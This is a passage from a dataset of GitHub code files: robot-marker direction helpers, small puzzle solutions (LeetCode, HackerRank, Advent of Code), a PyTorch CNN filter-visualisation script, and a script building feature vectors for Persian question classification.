{0}.\".format(marker.info)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_to_token_left(marker):\n \"\"\"Return the direction to the left of the token, according to the\n given marker, expressed as a ``WorldVector``.\n The left of the token is the one to the left when viewing an\n upright token from above.\n \"\"\"\n kind = marker.info.marker_type\n if kind == MARKER_TOP:\n return get_direction_to_left(marker)\n\n elif kind == MARKER_BOTTOM:\n return get_direction_to_right(marker)\n\n elif kind == MARKER_SIDE:\n zone = get_zone(marker)\n if zone == 0:\n return get_direction_to_right(marker)\n\n elif is_left_side_token(marker):\n return get_direction_out_from_face(marker)\n\n elif is_right_side_token(marker):\n return get_direction_behind_face(marker)\n\n elif is_rear_token(marker):\n return get_direction_to_left(marker)\n\n else:\n assert False, \"Unexpected side marker: {0}.\".format(marker.info)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_out_from_face(marker):\n \"\"\"Returns the direction out from the marker towards the viewer,\n expressed as a ``WorldVector``.\"\"\"\n\n to_top = get_direction_to_top(marker)\n to_right = get_direction_to_right(marker)\n\n return cross_product(to_top, to_right)\n\n\ndef get_direction_behind_face(marker):\n \"\"\"Returns the direction away behind a marker,\n expressed as a ``WorldVector``.\"\"\"\n\n to_top = get_direction_to_top(marker)\n to_right = get_direction_to_right(marker)\n\n return cross_product(to_right, to_top)\n\n\n# The following just use the direction vectors from one corner to another.\n# In an attempt to smooth any errors due to low resolution, we sum the\n# values from parallel edges of the marker in each case.\n\ndef get_direction_to_top(marker):\n \"\"\"Returns the direction from the bottom to the top of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n up_left = make_vector(bottom_left.world, top_left.world)\n up_right = make_vector(bottom_right.world, top_right.world)\n\n return vector_sum(up_left, up_right)\n\ndef get_direction_to_left(marker):\n \"\"\"Returns the direction from the left to the right of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n along_top = make_vector(top_right.world, top_left.world)\n along_bottom = make_vector(bottom_right.world, bottom_left.world)\n\n return vector_sum(along_top, along_bottom)\n\n\ndef get_direction_to_right(marker):\n \"\"\"Returns the direction from the right to the right of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n along_top = make_vector(top_left.world, top_right.world)\n along_bottom = make_vector(bottom_left.world, bottom_right.world)\n\n return vector_sum(along_top, along_bottom)\n","repo_name":"srobo/arena","sub_path":"comp16/token-check/marker_helpers.py","file_name":"marker_helpers.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18202983123","text":"\"\"\"\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/\n\nGiven an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.\n\nThe function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.\n\nNote:\n\nYour returned answers (both index1 and index2) are not zero-based.\nYou may assume that each input would have exactly one solution and you may not use the same element twice.\nExample:\n\nInput: numbers = [2,7,11,15], target = 9\nOutput: [1,2]\nExplanation: The sum of 2 and 7 is 9. Therefore index1 = 1, index2 = 2.\n\"\"\"\nfrom typing import List\nfrom bisect import bisect_left\n\nfrom Common.ObjectTestingUtils import run_functional_tests\n\n\"\"\"\nRuntime: 100 ms, faster than 26.85% of Python3 online submissions for Two Sum II - Input array is sorted.\nMemory Usage: 14.3 MB, less than 45.82% of Python3 online submissions for Two Sum II - Input array is sorted.\n\"\"\"\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n for i in range(len(numbers)):\n t2 = target - numbers[i]\n j = bisect_left(numbers, t2, i+1)\n if j != len(numbers) and numbers[j] == t2:\n return [i+1, j+1]\n\n\ntests = [\n [[2,7,11,15], 9, [1, 2]]\n]\n\nrun_functional_tests(Solution().twoSum, tests)\n\n","repo_name":"wtain/LeetCodePython","sub_path":"Algorithms/Basic/BinarySearch/NSum/TwoSum2_InputArrayIsSorted.py","file_name":"TwoSum2_InputArrayIsSorted.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"17329373528","text":"cube = lambda x: x ** 3 # complete the lambda function \n\ndef fibonacci(n):\n if n == 0:\n return []\n elif n == 1:\n return [0]\n elif n == 2:\n return [0, 1]\n else:\n fibs = fibonacci(n - 1)\n fibs.append(fibs[-1] + fibs[-2])\n return fibs\nif __name__ == '__main__':\n n = int(input())\n print(list(map(cube, fibonacci(n))))\n","repo_name":"BARarch/My-Hackerranks","sub_path":"map180814.py","file_name":"map180814.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7239799534","text":"#!/usr/bin/python3\n\n\ndef read_input(filename):\n read = []\n lines=open(filename, \"r\")\n for i in lines:\n #read.append(i.strip())\n #read.append(int(i.strip()))\n read.append(i.strip().split(' = '))\n return read\n\ndef int2bit(i, mask=None):\n bit = '{0:036b}'.format(int(i))\n b = ''\n if mask is not None:\n for x in range( len(bit)):\n if mask[x] != 'X':\n b = b+mask[x]\n else:\n b = b+bit[x]\n return b\n\ndef bit2int(b):\n return int(b,2)\n\nif __name__ == '__main__':\n f = read_input(\"input\")\n mask = ''\n mem = dict()\n for line in f:\n if line[0] == 'mask':\n mask = line[1]\n print(line)\n elif line[0][0:3] == 'mem':\n mem.update({line[0][4:-1]: int2bit(line[1], mask)})\n print(mem)\n sum = 0\n for i, j in mem.items():\n sum += bit2int(j)\n print(sum)\n","repo_name":"JackMcCrack/adventofcode2020","sub_path":"day14/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18498848159","text":"def solution(array, commands):\n answer = []\n arr = []\n\n for i in range(len(commands)):\n for j in range(commands[i][0] - 1, commands[i][1], 1):\n arr.append(array[j])\n arr.sort()\n answer.append(arr[commands[i][2] - 1])\n del arr[:]\n\n return answer\n\n\nprint(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))\n","repo_name":"Junbro0708/OpenCV_Python","sub_path":"Python/Basic/07_NumOfK.py","file_name":"07_NumOfK.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"8700520984","text":"#%%\nimport os\nimport sys\nimport cv2\nimport json\nimport math\nimport copy\nimport numpy as np\nimport pandas as pd\nimport torch \n# print(torch.__version__)\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torchvision.models as models\nimport PIL\nfrom PIL import Image\n# import matplotlib\n# matplotlib.use(\"AGG\")\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as mpl_color_map\nfrom torchsummary import summary\nimport flashtorch\nfrom flashtorch.saliency import Backprop\nimport seaborn as sns\nfrom torch.autograd import Variable\n\n#%%\nclass CNN(nn.Module):\n def __init__(self, input_shape=(1,48,48), conv1_filters=96, conv2_filters=256, conv3_filters=256, num_units=256, dropout=0.5, num_classes=7):\n super(CNN, self).__init__()\n self.conv_base = nn.Sequential(\n nn.Conv2d(1, conv1_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv1_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n\n nn.Conv2d(conv1_filters, conv2_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv2_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n\n nn.Conv2d(conv2_filters, conv3_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv3_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n )\n \n n_size = self._get_conv_output(input_shape)\n\n self.fc_base = nn.Sequential(\n nn.Dropout(p=dropout),\n nn.Linear(n_size, num_units),\n nn.ReLU(inplace=True),\n\n nn.Dropout(p=dropout),\n nn.Linear(num_units, num_units),\n nn.ReLU(inplace=True),\n )\n\n def _get_conv_output(self, shape):\n bs = 1\n inp = torch.rand(bs, *shape)\n out = self._forward_features(inp)\n return int(np.prod(out.size()[1:]))\n \n def _forward_features(self, x):\n x = self.conv_base(x)\n return x\n \n def forward(self, x):\n x = self.conv_base(x)\n x = x.view(x.size(0), -1)\n x = self.fc_base(x)\n return x\n\nclass train_hw3(Dataset):\n\n def __init__(self, data_dir, label, transform):\n self.data_dir = data_dir\n self.label = label\n self.transform = transform\n \n def __getitem__(self, index):\n pic_file = '{:0>5d}.jpg'.format(self.label[index][0])\n img = cv2.imread(os.path.join(self.data_dir, pic_file), cv2.IMREAD_GRAYSCALE)\n img = np.expand_dims(img, 0)\n return torch.FloatTensor(img), self.label[index, 1]\n # img = Image.open(os.path.join(self.data_dir, pic_file)).convert('RGB')\n # img = self.transform(img)\n # return img, self.label[index, 1]\n\n def __len__(self):\n return self.label.shape[0]\n\nclass test_hw3(Dataset):\n\n def __init__(self, data_dir, sample_submission, transform):\n self.data_dir = data_dir\n self.name = pd.read_csv(sample_submission).to_numpy()\n self.transform = transform\n \n def __getitem__(self, index):\n pic_file = '{:0>4d}.jpg'.format(self.name[index][0])\n img = cv2.imread(os.path.join(self.data_dir, pic_file), cv2.IMREAD_GRAYSCALE)\n img = np.expand_dims(img, 0)\n return torch.FloatTensor(img)\n # img = Image.open(os.path.join(self.data_dir, pic_file)).convert('RGB')\n # img = self.transform(img)\n # return img\n\n def __len__(self):\n return self.name.shape[0]\n\ndef train_valid_split(X, y=None, valid_size=0.2, random_state=42):\n n_train = int((1 - valid_size) * len(X))\n n_test = len(X) - n_train\n n_samples = len(X)\n\n rng = np.random.RandomState(random_state)\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n\n X_train = X[ind_train]\n X_valid = X[ind_test]\n if y is not None:\n y_train = y[ind_train]\n y_valid = y[ind_test]\n return X_train, X_valid, y_train, y_valid\n else:\n return X_train, X_valid\n#%%\n\nuse_cuda = torch.cuda.is_available()\nDEVICE = torch.device('cuda' if use_cuda else 'cpu')\nprint(\"Device:\", DEVICE)\n\n#%%\ntrain_img_dir = \"data/train_img\"\ntrain_csv = \"data/train.csv\"\ntest_img_dir = \"data/test_img\"\nsample_submission = \"data/sample_submission\"\noutput_csv = \"./pred.csv\"\n#%%\nmodel_pth = \"jobs/CNN_3_model/model/max_val_acc.pkl\"\n\nmodel = CNN(input_shape=(1,48,48), conv1_filters=64, conv2_filters=128, conv3_filters=512, num_units=64, dropout=0.5, num_classes=7)\nmodel.load_state_dict(torch.load(model_pth, map_location=DEVICE))\nmodel.eval()\n#%%\nprint(model.conv_base[8].weight.cpu().detach().clone().shape)\n\n# %%\nlabels = pd.read_csv(train_csv).to_numpy()\ntrain_label, valid_label = train_valid_split(labels, valid_size=2000/len(labels), random_state=77)\n\n# %%\ntransform = transforms.Compose([\n # transforms.RandomAffine(15, translate=(0.1,0.1), scale=(0.9,1.1), shear=10, fillcolor=0),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n #transforms.Normalize([mean], [std], inplace=False)\n ])\n\ntrain_dataset = train_hw3(train_img_dir, train_label, transform)\nvalid_dataset = train_hw3(train_img_dir, valid_label, transform)\ntrain_loader = DataLoader(train_dataset, batch_size=64) \nvalid_loader = DataLoader(valid_dataset, batch_size=512) \n\n\n#%%\n# visualize all filters (filter weight)\nkernels = model.conv_base[8].weight.cpu().detach().clone()\nkernels = kernels - kernels.min()\nkernels = kernels / kernels.max()\n\n# %%\ndef vistensor(tensor, ch=0, allkernels=False, nrow=8, padding=1): \n '''\n vistensor: visuzlization tensor\n @ch: visualization channel \n @allkernels: visualization all tensores\n ''' \n \n n,c,w,h = tensor.shape\n if allkernels: tensor = tensor.view(n*c,-1,w,h )\n elif c != 3: tensor = tensor[:,ch,:,:].unsqueeze(dim=1)\n \n rows = np.min( (tensor.shape[0]//nrow + 1, 64 ) ) \n grid = utils.make_grid(tensor, nrow=nrow, normalize=True, padding=padding)\n plt.figure( figsize=(nrow,rows) )\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n # plt.savefig(\"./plot/kernel.png\")\n plt.show()\n\n#%%\nik = 8\nkernel = model.conv_base[ik].weight.data.clone()\nprint(kernel.shape)\nvistensor(kernel, ch=0, nrow=16, allkernels=False)\n\n# %%\ndef convert_to_grayscale(im_as_arr):\n \"\"\"\n Converts 3d image to grayscale\n Args:\n im_as_arr (numpy arr): RGB image with shape (D,W,H)\n returns:\n grayscale_im (numpy_arr): Grayscale image with shape (1,W,D)\n \"\"\"\n grayscale_im = np.sum(np.abs(im_as_arr), axis=0)\n im_max = np.percentile(grayscale_im, 99)\n im_min = np.min(grayscale_im)\n grayscale_im = (np.clip((grayscale_im - im_min) / (im_max - im_min), 0, 1))\n grayscale_im = np.expand_dims(grayscale_im, axis=0)\n return grayscale_im\n\n\ndef save_gradient_images(gradient, file_name):\n \"\"\"\n Exports the original gradient image\n Args:\n gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)\n file_name (str): File name to be exported\n \"\"\"\n if not os.path.exists('./results'):\n os.makedirs('./results')\n # Normalize\n gradient = gradient - gradient.min()\n gradient /= gradient.max()\n # Save image\n path_to_file = os.path.join('./results', file_name + '.jpg')\n save_image(gradient, path_to_file)\n\n\ndef save_class_activation_images(org_img, activation_map, file_name):\n \"\"\"\n Saves cam activation map and activation map on the original image\n Args:\n org_img (PIL img): Original image\n activation_map (numpy arr): Activation map (grayscale) 0-255\n file_name (str): File name of the exported image\n \"\"\"\n if not os.path.exists('./results'):\n os.makedirs('./results')\n # Grayscale activation map\n heatmap, heatmap_on_image = apply_colormap_on_image(org_img, activation_map, 'hsv')\n # Save colored heatmap\n path_to_file = os.path.join('./results', file_name+'_Cam_Heatmap.png')\n save_image(heatmap, path_to_file)\n # Save heatmap on iamge\n path_to_file = os.path.join('./results', file_name+'_Cam_On_Image.png')\n save_image(heatmap_on_image, path_to_file)\n # SAve grayscale heatmap\n path_to_file = os.path.join('./results', file_name+'_Cam_Grayscale.png')\n save_image(activation_map, path_to_file)\n\n\ndef apply_colormap_on_image(org_im, activation, colormap_name):\n \"\"\"\n Apply heatmap on image\n Args:\n org_img (PIL img): Original image\n activation_map (numpy arr): Activation map (grayscale) 0-255\n colormap_name (str): Name of the colormap\n \"\"\"\n # Get colormap\n color_map = mpl_color_map.get_cmap(colormap_name)\n no_trans_heatmap = color_map(activation)\n # Change alpha channel in colormap to make sure original image is displayed\n heatmap = copy.copy(no_trans_heatmap)\n heatmap[:, :, 3] = 0.4\n heatmap = Image.fromarray((heatmap*255).astype(np.uint8))\n no_trans_heatmap = Image.fromarray((no_trans_heatmap*255).astype(np.uint8))\n\n # Apply heatmap on iamge\n heatmap_on_image = Image.new(\"RGBA\", org_im.size)\n heatmap_on_image = Image.alpha_composite(heatmap_on_image, org_im.convert('RGBA'))\n heatmap_on_image = Image.alpha_composite(heatmap_on_image, heatmap)\n return no_trans_heatmap, heatmap_on_image\n\n\ndef format_np_output(np_arr):\n \"\"\"\n This is a (kind of) bandaid fix to streamline saving procedure.\n It converts all the outputs to the same format which is 3xWxH\n with using sucecssive if clauses.\n Args:\n im_as_arr (Numpy array): Matrix of shape 1xWxH or WxH or 3xWxH\n \"\"\"\n # Phase/Case 1: The np arr only has 2 dimensions\n # Result: Add a dimension at the beginning\n if len(np_arr.shape) == 2:\n np_arr = np.expand_dims(np_arr, axis=0)\n # Phase/Case 2: Np arr has only 1 channel (assuming first dim is channel)\n # Result: Repeat first channel and convert 1xWxH to 3xWxH\n if np_arr.shape[0] == 1:\n np_arr = np.repeat(np_arr, 3, axis=0)\n # Phase/Case 3: Np arr is of shape 3xWxH\n # Result: Convert it to WxHx3 in order to make it saveable by PIL\n if np_arr.shape[0] == 3:\n np_arr = np_arr.transpose(1, 2, 0)\n # Phase/Case 4: NP arr is normalized between 0-1\n # Result: Multiply with 255 and change type to make it saveable by PIL\n if np.max(np_arr) <= 1:\n np_arr = (np_arr*255).astype(np.uint8)\n return np_arr\n\n\ndef save_image(im, path):\n \"\"\"\n Saves a numpy matrix or PIL image as an image\n Args:\n im_as_arr (Numpy array): Matrix of shape DxWxH\n path (str): Path to the image\n \"\"\"\n if isinstance(im, (np.ndarray, np.generic)):\n im = format_np_output(im)\n im = Image.fromarray(im)\n im.save(path)\n\n\ndef preprocess_image(pil_im, resize_im=True):\n \"\"\"\n Processes image for CNNs\n Args:\n PIL_img (PIL_img): Image to process\n resize_im (bool): Resize to 224 or not\n returns:\n im_as_var (torch variable): Variable that contains processed float tensor\n \"\"\"\n # mean and std list for channels (Imagenet)\n # mean = [0.485, 0.456, 0.406]\n # std = [0.229, 0.224, 0.225]\n # Resize image\n if resize_im:\n pil_im.thumbnail((224, 224))\n im_as_arr = np.float32(pil_im)\n # print(im_as_arr.shape)\n im_as_arr = im_as_arr.transpose(2, 0, 1) # Convert array to D,W,H\n # Normalize the channels\n for channel, _ in enumerate(im_as_arr):\n im_as_arr[channel] /= 255\n # im_as_arr[channel] -= mean[channel]\n # im_as_arr[channel] /= std[channel]\n # Convert to float tensor\n im_as_ten = torch.from_numpy(im_as_arr).float()\n # Add one more channel to the beginning. Tensor shape = 1,3,224,224\n im_as_ten.unsqueeze_(0)\n # Convert to Pytorch variable\n im_as_var = Variable(im_as_ten, requires_grad=True)\n return im_as_var\n\n\ndef recreate_image(im_as_var):\n \"\"\"\n Recreates images from a torch variable, sort of reverse preprocessing\n Args:\n im_as_var (torch variable): Image to recreate\n returns:\n recreated_im (numpy arr): Recreated image in array\n \"\"\"\n # reverse_mean = [-0.485, -0.456, -0.406]\n # reverse_std = [1/0.229, 1/0.224, 1/0.225]\n recreated_im = copy.copy(im_as_var.data.numpy()[0])\n # print(im_as_var.shape)\n # for c in range(im_as_var.shape[1]):\n # recreated_im[c] /= reverse_std[c]\n # recreated_im[c] -= reverse_mean[c]\n recreated_im[recreated_im > 1] = 1\n recreated_im[recreated_im < 0] = 0\n recreated_im = np.round(recreated_im * 255)\n\n recreated_im = np.uint8(recreated_im).transpose(1, 2, 0) # W,H,C\n if recreated_im.shape[2] == 3:\n return recreated_im\n return recreated_im.reshape(recreated_im.shape[1], recreated_im.shape[1])\n\n\n#%%\nclass SaveFeatures():\n def __init__(self, module):\n self.hook = module.register_forward_hook(self.hook_fn)\n def hook_fn(self, module, input, output):\n self.features = torch.tensor(output,requires_grad=True).to(DEVICE)\n def close(self):\n self.hook.remove()\n\nclass FilterVisualizer():\n def __init__(self, model, size=56, upscaling_steps=12, upscaling_factor=1.2, ch=1):\n self.size, self.upscaling_steps, self.upscaling_factor = size, upscaling_steps, upscaling_factor\n self.model = model\n self.ch = ch\n def visualize(self, layer, filter, lr=0.1, opt_steps=20, blur=None):\n sz = self.size\n img = np.uint8(np.random.uniform(150, 180, (sz, sz, self.ch))) # generate random image\n activations = SaveFeatures(list(self.model.children())[layer]) # register hook\n # processed_image = preprocess_image(img, False)\n\n for _ in range(self.upscaling_steps): # scale the image up upscaling_steps times\n img = img.reshape(sz,sz,self.ch)\n img_var = preprocess_image(img, False)\n optimizer = torch.optim.Adam([img_var], lr=lr, weight_decay=1e-6)\n for n in range(opt_steps): # optimize pixel values for opt_steps times\n optimizer.zero_grad()\n self.model(img_var)\n loss = -activations.features[0, filter].mean()\n loss.backward()\n optimizer.step()\n img = recreate_image(img_var)\n self.output = img\n sz = int(self.upscaling_factor * sz) # calculate new image size\n img = cv2.resize(img, (sz, sz), interpolation = cv2.INTER_CUBIC) # scale image up\n if blur is not None: img = cv2.blur(img,(blur,blur)) # blur image to reduce high frequency patterns\n # print(self.output.shape)\n self.save(layer, filter)\n activations.close()\n \n def save(self, layer, filter):\n # plt.imsave(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".jpg\", np.clip(self.output, 0, 1))\n plt.imsave(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".png\", self.output)\n#%%\nlayer = 8\nfilter = 414\n\nFV = FilterVisualizer(model=model.conv_base, size=48, ch=1, upscaling_steps=3, upscaling_factor=1.2)\nFV.visualize(layer, filter, blur=1)\n\nimg = PIL.Image.open(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".png\")\nplt.imshow(np.array(img))\nplt.show()\n\n\n\n\n\n#%%\nimg = PIL.Image.open(\"data/train_img/00037.jpg\")\nimg = transform(img).reshape(1,1,48,48).to(DEVICE)\n# img.numpy().reshape(48,48,1)\nplt.imshow(img.numpy().reshape(48,48), cmap='gray')\nplt.show()\n\n\n# %%\ncnn_layer = 8\nactivations = SaveFeatures(model.conv_base[cnn_layer])\nmodel.conv_base(img)\n# %%\ntotal_filters_in_layer = 512\nmean_act = [activations.features[0,i].mean().item() for i in range(total_filters_in_layer)]\n\nprint(\"max act:\", np.argmax(mean_act))\n\nthresh = 0.46\nfilter_pos_over_thresh = [i for i in range(total_filters_in_layer) if mean_act[i]>thresh]\nprint(f\"act > thresh({thresh})\", filter_pos_over_thresh)\n\n#%%\nfilter_pos = np.argmax(mean_act)\nplt.figure(figsize=(7,5))\nact = plt.plot(mean_act,linewidth=2.)\nextraticks=[filter_pos]\nax = act[0].axes\nax.set_xlim(0,500)\nplt.axvline(x=filter_pos, color='grey', linestyle='--')\nax.set_xlabel(\"feature map\")\nax.set_ylabel(\"mean activation\")\nax.set_xticks([0,200,400] + extraticks)\nplt.show()\n\n# %%\n","repo_name":"TSLsun/ML2019FALL","sub_path":"hw3/plot/plot_filter_activations.py","file_name":"plot_filter_activations.py","file_ext":"py","file_size_in_byte":16352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14458538445","text":"# coding=utf-8\nimport numpy as np\nimport pandas as pd\nimport sys\nimport pickle\n\nfrom utilitarianism import Progresser, QuickDataFrame\n\n\ndef tokenise(qstn):\n for ch in [':', ';', ',', '?', '!', '\\'', '\\\"', '\\\\', '/', '(', ')', '[', ']', '…', '...', '–', '-', '<', '>', '؟',\n '،', '.', '­', '«', '»', '_', '+', '=', ]:\n qstn = qstn.replace(ch, ' ')\n # TODO: use a better method\n return qstn.split()\n\n\ndef concat_word2vec_subjs():\n w2v = pd.read_csv('questions-word2vec.txt', header=None)\n questions = pd.read_csv('result_filtered.csv', delimiter=';')\n subjs = pd.read_csv('./combining_tags_data/subjs-result.csv', delimiter=';')\n trn = pd.DataFrame()\n for i, subj in subjs.iterrows():\n trn['sub' + str(subj['id'])] = 0\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, subj in subjs.iterrows():\n sub_id = str(subj['id'])\n trn.loc[i, 'sub' + sub_id] = 0\n if qrow['subject1'] == subj['tag'] or qrow['subject2'] == subj['tag'] or qrow['subject3'] == subj['tag']:\n trn.loc[i, 'sub' + sub_id] = 1\n # print i, '----',trn.loc[i]\n\n result = pd.concat([trn, w2v], axis=1)\n result.to_csv('subj-word2vec.csv', index=False, header=None)\n\n\ndef concat_word2vec_types():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n w2v = pd.read_csv('./Primary_data/questions-word2vec.txt', header=None)\n types = pd.read_csv('./combining_tags_data/types-result.csv', delimiter=';')\n\n # creating dataframe\n train = pd.DataFrame(dtype=object)\n for i, typ in types.iterrows():\n train['typ' + str(typ['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, typ in types.iterrows():\n typ_id = str(typ['id'])\n train.loc[i, 'typ' + typ_id] = 0\n if qrow['type1'] == typ['tag'] or qrow['type2'] == typ['tag'] or qrow['type3'] == typ['tag']:\n train.loc[i, 'typ' + typ_id] = 1\n\n result = pd.concat([train, w2v], axis=1)\n result.to_csv('type-word2vec.csv', index=False)\n\n\ndef create_1000word_vector():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n # questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n words_vector = pd.read_csv('./Primary_data/words_vector.csv')\n # first_rows = 2799\n\n # create dataframe\n train = pd.DataFrame(dtype=object)\n for wrd in words_vector['term'].as_matrix():\n train[wrd] = 0\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n train.loc[i, words_vector['term'][0]] = 0\n # set occurrence values\n for word in tokenise(qrow['sentence']):\n if word in train:\n train.loc[i, word] = 1\n\n # for i, qrow in questions_2.iterrows():\n # if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i + first_rows))\n # train.loc[i + first_rows, words_vector['term'][0]] = 0\n # # set occurrence values\n # for word in tokenise(str(qrow['content']) + ' ' + qrow['title']):\n # if word in train:\n # train.loc[i + first_rows, word] = 1\n\n print(train.shape)\n train = train.fillna(0)\n\n # rename columns\n number = 0\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n train = train.rename(columns={col: 'wrd' + str(number)})\n number += 1\n print(train.shape)\n train.to_csv('1000word_vector_Q.csv', index=False)\n\n\ndef create_clean_questions():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n # stop_words = set(pd.read_csv('./Primary_data/PersianStopWordList.txt', header=None)[0])\n with open('./Primary_data/questions.txt', 'w', encoding='utf-8') as outf:\n for i, qrow in questions.iterrows():\n outf.write(' '.join(tokenise(qrow['sentence'])) + '\\n')\n\n\ndef create_type_vector():\n questions = pd.read_csv('./Primary_data/result_filtered.csv', delimiter=';')\n types = pd.read_csv('./combining_tags_data/types-result.csv', delimiter=';')\n\n # creating dataframe\n train = pd.DataFrame(dtype=object)\n for i, typ in types.iterrows():\n train['typ' + str(typ['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # set occurrence of the subjects\n for j, typ in types.iterrows():\n typ_id = str(typ['id'])\n train.loc[i, 'typ' + typ_id] = 0\n if qrow['type1'] == typ['tag'] or qrow['type2'] == typ['tag'] or qrow['type3'] == typ['tag']:\n train.loc[i, 'typ' + typ_id] = 1\n\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n\n train.to_csv('./Primary_data/type_vector_Q.csv', index=False)\n\n\ndef create_topic_vector():\n questions = pd.read_csv('result_filtered.csv', delimiter=';')\n # questions_2 = pd.read_csv('./Porsak_data/qa_questions-refined.csv', delimiter=';')\n topics = pd.read_csv('./Porsak_data/topic_list.csv')\n # first_rows = 2799\n\n # creating dataframe\n topic_id = dict()\n train = pd.DataFrame(dtype=object)\n for i, tpc in topics.iterrows():\n topic_id[tpc['topic']] = 'tpc' + str(tpc['id'])\n train['tpc' + str(tpc['id'])] = 0\n\n # build the train data\n for i, qrow in questions.iterrows():\n if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n\n # set occurrence of the topics\n for j, tpc in topics.iterrows():\n train.loc[i, 'tpc' + str(tpc['id'])] = 0\n\n try:\n train.loc[i, topic_id[qrow['subject1']]] = 1\n train.loc[i, topic_id[qrow['subject2']]] = 1\n train.loc[i, topic_id[qrow['subject3']]] = 1\n except Exception as e:\n if str(e) != 'nan':\n print(e)\n\n # build the train data from second list of questions\n # for i, qrow in questions_2.iterrows():\n # if i % 100 == 0: sys.stdout.write('\\r' + 'processed question ' + str(i))\n # # set occurrence of the topics\n # for j, tpc in topics.iterrows():\n # col_name = 'tpc' + str(tpc['id'])\n # train.loc[i + first_rows, col_name] = 0\n # if qrow['topic'] == tpc['topic']:\n # train.loc[i + first_rows, col_name] = 1\n\n for col in train:\n train[col] = train.apply(lambda row: int(row[col]), axis='columns')\n\n train.to_csv('topic_vector_Q.csv', index=False)\n\n\ndef concat_1000vec_type_cat():\n wrd = pd.read_csv('./Primary_data/1000word_vector_Q.csv')\n subj = pd.read_csv('./Primary_data/topic_vector_Q.csv')\n # type = pd.read_csv('type_vector_Q.csv')\n # result = pd.concat([type, subj, wrd], axis=1)\n # result = pd.concat([type, wrd], axis=1)\n result = pd.concat([subj, wrd], axis=1)\n result.to_csv('./Primary_data/arff/13_tpc;wrd.arff', index=False)\n\n\ndef concat_all():\n bow = pd.read_csv('./Primary_data/1000word_vector_Q.csv')\n w2v = pd.read_csv('./Primary_data/w2v-100_vector_Q.csv')\n typ = pd.read_csv('./Primary_data/type_vector_Q.csv')\n tpc = pd.read_csv('./Primary_data/topic_vector_Q.csv')\n\n result = pd.concat([typ, bow], axis=1)\n result.to_csv('./Primary_data/arff/1_typ;bow.arff', index=False)\n\n result = pd.concat([typ, w2v], axis=1)\n result.to_csv('./Primary_data/arff/2_typ;w2v.arff', index=False)\n\n result = pd.concat([typ, tpc, bow], axis=1)\n result.to_csv('./Primary_data/arff/3_typ;tpc,bow.arff', index=False)\n\n result = pd.concat([tpc, bow], axis=1)\n result.to_csv('./Primary_data/arff/4_tpc;bow.arff', index=False)\n\n result = pd.concat([tpc, w2v], axis=1)\n result.to_csv('./Primary_data/arff/5_tpc;w2v.arff', index=False)\n\n\ndef create_arff_header():\n header = '@relation \\'CQA\\'\\n\\n'\n # for i in 